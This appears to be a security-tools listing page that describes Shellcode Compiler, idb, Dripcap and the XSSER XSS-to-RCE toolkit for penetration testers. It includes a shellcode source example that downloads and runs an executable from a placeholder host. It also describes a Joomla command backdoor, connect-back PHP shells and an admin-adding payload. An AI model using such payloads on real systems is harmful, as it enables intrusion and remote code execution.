Shellcode C/C++ Compiler for Windows - ShellcodeCompiler

Shellcode Compiler is a program that compiles C/C++ style code into a small, position-independent and NULL-free shellcode for Windows. It is possible to call any Windows API function in a user-friendly way.

Shellcode Compiler takes as input a source file and it uses it's own compiler to interpret the code and generate an assembly file which is assembled with NASM ( http://www.nasm.us/ ).

Shellcode compiler was released at DefCamp security conference in Romania, November 2016.

Command line options

    -h (--help)      : Show this help message
    -v (--verbose)   : Print detailed output
    -t (--test)      : Test (execute) generated shellcode
    -r (--read)      : Read source code file
    -o (--output)    : Output file of the generated binary shellcode
    -a (--assembbly) : Output file of the generated assembly code

Source code example

    function URLDownloadToFileA("urlmon.dll");
    function WinExec("kernel32.dll");
    function ExitProcess("kernel32.dll");

    URLDownloadToFileA(0,"https://site.com/bk.exe","bk.exe",0,0);
    WinExec("bk.exe",0);
    ExitProcess(0);

Invocation example

    ShellcodeCompiler.exe -r Source.txt -o Shellcode.bin -a Assembly.asm

Limitations

1. It is not possible to use the return value of an API call
2. It is not possible to use pointers or buffers
3. It is not possible to declare variables

All these limitations will be fixed as soon as possible. However, many other limitations will exist. This is an Alpha version. Please report any bugs or suggestions.

Download ShellcodeCompiler

Read More

iOS App Security Assessment Tool - idb

idb is a tool to simplify some common tasks for iOS app security assessments and research. Please see the Documentation for a more detailed summary of each function.

Features

• Assessment Setup
  • SSH port forwarding
  • Installation of helper utilities
• App Information
  • Bundle information
  • Registered URL Schemes
  • Platform and SDK Versions
  • Data folder location
  • Entitlements
• Data Storage
  • List plist files and data protection class
  • List sqlite files and data protection class
  • List Cache.db files and data protection class
  • Full app file system browser
    • Browse files
    • Download/view files
    • Check data protection
    • Rsync folders and keep git revisions
  • Dump iOS keychain
• Binary Analysis
  • Check for encryption
  • Check for protections (ASLR/PIE, DEP, ARC)
  • List shared libraries
  • Extract strings in app binary
  • Dump class and method signatures
• IPC
  • List URL handlers
  • Invoke and fuzz URL handlers
  • Monitor the iOS pasteboardA
• Other Tools
• Check for iOS backgrounding screenshot
• Install certificates
• Edit /etc/hosts file

Download idb

Read More

Caffeinated Packet Analyzer - Dripcap

Caffeinated packet analyzer. Dripcap is a modern packet analyzer based on Electron.

Getting Started

• Download & Install
• Capturing
• Packet Filtering
• Display Filter Syntax

Advanced Usage

• Build from source
• Import Pcap Files
• Install Add-on Packages

Create & Publish Your Package

• Create Theme Package
• Create Dissector Package
• Create UI Package
• Publish Package

Dissector Overview

• Dissection Process
• Namespace
• Create a Custom Dissector Class

API Reference

• UI Classes
• Builtin Dissector Classes

Download Dripcap

Read More

From XSS to RCE - XSSER

From XSS to RCE 2.5 - Black Hat Europe Arsenal 2016

Demo

• Version 2.0 - 2015: https://www.youtube.com/playlist?list=PLIjb28IYMQgqqqApoGRCZ_O40vP-eKsgf
• Version 2.5 - 2016: https://www.youtube.com/playlist?list=PLRic6PgcrsWGkgacL6WFnSQKVRZIoofRj

Requirements

• Python (2.7.*, version 2.7.11 was used for development and demo)
• Gnome
• Bash
• Msfconsole (accessible via environment variables)
• Netcat (nc)
• cURL (curl) [NEW]
• PyGame (apt-get install python-pygame) [NEW]

Payload Compatibility

• Chrome (14 Nov 2015) - This should still work.
• Firefox (04 Nov 2016) - Tested live at Black Hat Arsenal 2016

WordPress Lab

• WordPress http://wordpress.org/
• Better WP Security 3.5.3 http://www.exploit-db.com/wp-content/themes/exploit/applications/c6d6beb3c11bc58856e15218d512b851-better-wp-security.3.5.3.zip
• Optional: WPSEO https://yoast.com/wordpress/plugins/seo/

WordPress Exploit

• http://www.exploit-db.com/exploits/27290/

Joomla Lab

• Joomla https://www.joomla.org/
• SecurityCheck 2.8.9 https://www.exploit-db.com/apps/543ccd00b06d24be139d7e18212a0916-com_securitycheck_j3x-2.8.9.zip

Joomla Exploit

• https://www.exploit-db.com/exploits/39879/

Directories

• Audio: Contains remixed audio notifications.
• Exploits: Contains DirtyCow (DCOW) privilege escalation exploits.
• Joomla_Backdoor: Contains a sample Joomla extension backdoor which can be uploaded as an administrator and subsequently used to execute arbitrary commands on the system with system($_GET['c']).
• Payloads/javascript: Contains the JavaScript payloads. Contains a new "add new admin" payload for Joomla.
• Shells: Contains the PHP shells to inject, including a slightly modified version of pentestmonkey's shell that connects back via wget.

Developed By

• Hans-Michael Varbaek
• Sense of Security

Credits

• MaXe / InterN0T

Download XSSER

Read More